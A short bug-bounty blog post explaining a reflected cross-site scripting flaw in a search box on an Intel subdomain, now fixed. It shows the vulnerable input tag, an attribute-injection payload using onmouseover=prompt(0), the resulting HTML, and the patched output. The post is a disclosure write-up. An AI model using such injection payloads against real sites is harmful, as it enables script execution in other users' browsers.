Marsの5εcur1ty備忘録

不定期的にCTF、脆弱性検証、バグバウンティレポート分析など、情報セキュリティを中心とした技術ブログを更新します。

XSS Bug on Intel Subdomain, Explained poc video

www.youtube.com

Here it is a XSS vulnerability on Intel subdomain. We could notice that it reflects our input contents when we submit something. However, nothing will be reflected when we submit which it contains the symbol "<" or ">".

XSS will be triggered on this line.

<input type="text" name="searchword" placeholder="Search" class="form-control input-lg" value="" placeholder="" autocomplete="off" />

When we submit this content :

hello" onmouseover=prompt(0) something="

This input tag will become the following stuff.

<input type="text" name="searchword" placeholder="Search" class="form-control input-lg" value="hello" onmouseover=prompt(0) something="" placeholder="" autocomplete="off" />


This bug have already been fixed:

<input type="text" name="searchword" placeholder="Search" class="form-control input-lg" value="hello&quot; onmouseover prompt(0) something &quot;" placeholder="" autocomplete="off" />

The result shows double quotes are replaced as &quot; , and "=" is just filtered.

Copyright Mars 2019